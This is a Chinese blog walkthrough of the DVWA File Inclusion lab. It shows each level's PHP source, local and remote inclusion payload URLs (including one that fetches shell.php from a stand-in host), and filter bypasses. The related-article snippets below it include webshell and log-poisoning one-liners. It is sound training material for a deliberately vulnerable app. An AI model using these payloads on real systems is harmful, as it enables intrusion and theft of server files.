DVWA之File Inclusion

最新推荐文章于 2021-02-23 21:32:33 发布
最新推荐文章于 2021-02-23 21:32:33 发布
阅读量92 收藏
点赞数
分类专栏: DVWA 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42075643/article/details/113847260
版权

服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这就可以将所有页面共用的页面用包含的形式来调用,无需重复编写,这种方式就是文件包含。
若这种包含没有相应的校验,就会使hacker传入恶意的代码来查看敏感文件,造成文件泄露等等
文件包含有两种类型:本地文件包含和远程文件包含
文件包含涉及到四个危险函数:
require():包含并且运行,包含文件发生错误时终止程序

require_once():与require()相似,但是只导入一次

include():包含并运行,包含文件发生错误时,发出警告并继续运行

include_once():与include()相似,但是会检验是否被导入,可以理解为只导入一次

接下来开始实验吧~

low level

查看源代码:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

可以看到代码没有任何限制过滤,可以任意包含文件…
首先随便写个包含文件:

http://localhost/DVWA/vulnerabilities/fi/?page=111.php

在这里插入图片描述
直接报出了网站路径。。。

需要说明的是:不管文件后缀是否是php,都会当做php文件执行,如果文件内容确认为php,则正常执行并返回结果,如果不是,则返回打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。

例如:
http://localhost/DVWA/vulnerabilities/fi/?page=E:/webpage/public/DVWA/php.ini

显示:
在这里插入图片描述
会将里边的内容显示出来
这种情况也可能存在远端文件包含漏洞

查看是否存在远端文件包含:
例如:

http://localhost/DVWA/vulnerabilities/fi/?page=http://yourip/shell.php

有条件可以测试一下,若存在可以直接通过蚁剑连接

medium level

查看源码:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

可以看到代码中str_replace()函数对“http://”、“https://”、“…/”、“…\”进行了过滤替换为空字符,即删除~

这中类型的过滤可以直接 双写绕过,例如:hthttps://tps://htthttp://p://,其他的跟low level一样,不受影响。

high level

查看源代码:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

fnmatch() 函数是对照指定的pattern来匹配filename或strings。

也就是要求page参数的开头必须是file,服务器才会去包含相应的文件。
这个就跟用浏览器打开本地文件一样,直接构造payload:

http://localhost/DVWA/vulnerabilities/fi/?page=file:///E:/webpage/public/DVWA/php.ini

在这里插入图片描述
同样可以访问本地文件~

impossible level

看代码:


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

这种类似于白名单方式,只能是在白名单里的页面可以访问,完美避过了其他文件包含

<小白初试,希望路过大佬多多指正>

小菜茑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA--file inclusion(文件包含)
weixin_50342860的博客
08-20 207
目录风险lowmediuhigh修复目录遍历与文件包含的区别 风险 通过php的特性函数利用url动态包含文件,因为没有对文件来源进行严格审查,导致任意文件读取或者任意命令执行。 前提: allow_url_fopen=on(是否允许将URL作为文件处理,默认为on) allow_url_include=off(是否允许include/require打开URL作为文件处理 默认为off) low 查看源码:发现对page这个参数没有做任何过滤 这里尝试做php的操作: 构造url,显示报错的同时显
DVWAFile Inclusion(文件包含)
weixin_41182861的博客
06-04 211
前言
DVWA-File Inclusion(文件包含)
简简的博客
02-02 385
本系列文集:DVWA学习笔记 文件包含漏洞,是指当服务器开启allow_url_include选项时,就可以通过php的某些特性include(),require(),include_once(),require_once()利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是...
DVWA通关 File Inclusion
干铮的博客
08-06 213
文件包含漏洞 File Inclusion 程序开发⼈员通常会把可重复使⽤函数写到单个⽂件中,在使⽤某个函数的时候,直接调⽤此⽂件,⽆需再次编写,这种调⽤⽂件的过程通常称为包含。 程序开发⼈员都希望代码更加灵活,所以会把被包含的⽂件的路径设置为变量,来进⾏动态调⽤,但是正是由于这种灵活性,如果被包含⽂件的路径客户端可控,造成⽂件包含漏洞。 ⼏乎所有的脚步都会提供⽂件包含的功能,⽂件包含漏洞在PHP 的Web 应⽤中居多,在JSP/ASP/ASP.NET 程序中⽐较少。 文件包含的原理 配置文件开启文
DVWAFile Inclusion
chtdgf的博客
02-23 132
DVWAFile Inclusion 1.LOW级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 服务器获取 page 的值,没有进行任何过滤。 二 MEDIUM级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file
DVWA最新版
03-23
DVWA的"File Inclusion"部分让你了解这类漏洞的危害,学习如何设置严格的文件验证规则以避免此类风险。 命令注入是指攻击者能够注入操作系统命令到应用程序,从而执行恶意操作。在"Command Injection"模块中,你将...
DVWA-master.zip
06-09
3. **文件包含漏洞**:"File Inclusion"挑战让你理解如何利用程序错误,将外部文件内容插入到网页中。这可能导致服务器上的敏感信息泄露,甚至允许攻击者远程执行代码。 4. **命令注入**:DVWA的"Command Injection...
DVWA练习平台
04-24
4. **文件包含漏洞(File Inclusion)**:此漏洞允许攻击者通过改变包含文件的路径,引入恶意代码或数据。DVWA的文件包含练习能让你理解如何防止这种情况,如使用绝对路径,禁止远程文件包含,以及限制可包含的文件...
DVWA配置二所需压缩包
11-09
- **vulnerabilities** - 存放各个漏洞模块的目录,如`sql_injection`, `command_injection`, `xss`, `file_inclusion`等。 - **index.php** - 入口文件,负责加载和处理请求。 2. **安装过程** - 在Win10 64位...
DVWA的压缩文件安装包下载
最新发布
09-30
4. **文件包含漏洞**:在"File Inclusion"环节,你可以看到如何利用错误配置的文件包含功能来读取服务器上的任意文件,甚至执行服务器上的代码。了解如何正确处理文件包含函数可以防止这类攻击。 5. **认证与会话...
DVWA-File Inclusion
weixin_44866139的博客
02-07 280
文件包含是指应用程序加载的文件(本地/远程)可以由用户提交的数据控制,从而导致攻击者控制恶意文件在服务器上执行. 对于php来说,常见的文件包含函数有如下: require:找不到被包含的文件,报错,并且停止运行脚本。 include:找不到被包含的文件,只会报错,但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...
DVWA全级别教程学习及备课笔记:File Inclusion(文件包含)
lm19770429的专栏
10-12 217
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是 Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAP
DVWA练习之File Inclusion
dz919908651的博客
08-22 1362
DVWA练习之File Inclusion 本博客将记录在web安全问题中一种常见的漏洞——“文件包含”漏洞的实践演练。首先阐述文件漏洞的概念,原理,最后展示基于DVWA的各种等级的文件包含漏洞。 文件包含 概念:指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数,利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任...
DVWAFile Inclusion(文件包含)
谢公子的博客
10-01 9652
目录 LOW: Medium: High Impossible LOW: 源代码: &lt;?php // The page we wish to display $file = $_GET[ 'page' ]; ?&gt; 可以看到,low级别的代码对包含的文件没有进行任何的过滤!这导致我们可以进行包含任意的文件。 当我们包含一个不存在的文件 haha.php ,看看会发生...
DVWA使用教程(File Inclusion)(四)
ai_64的博客
06-16 6691
DVWA使用教程(File Inclusion)(四) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上传) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL...
DVWA--File Inclusion(文件包含)--四个级别
1stPeak's Blog
10-29 1406
文件包含,主要由于php.ini配置不严格,allow_url_fopen=On是导致文件包含的元凶之一 和php函数运用的严谨程度 php文件包含常用函数: Include: 包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行 Require: 跟include唯一不同的是,当产生错误时候,include会继续运行而require停止运行 Inc...
远程执行文件包含
weixin_30347335的博客
01-08 277
<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat /var/log/httpd...
DVWA中的File Inclusion(文件包含)
hwy2506451901的博客
04-04 465
最近课上用到了DVWA,通过学习总结了文件包含部分的内容,以下是个人的总结,因为刚刚入门 所以写的比较详细,希望对刚学习这一部分的朋友们有所帮助。 **原理:**PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 **类型:**本地文件包含,远程文件包含(相对较容易) **提示:**...
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1181
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
dvwa file inclusionfile upload
05-12
其中包括文件包含(File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值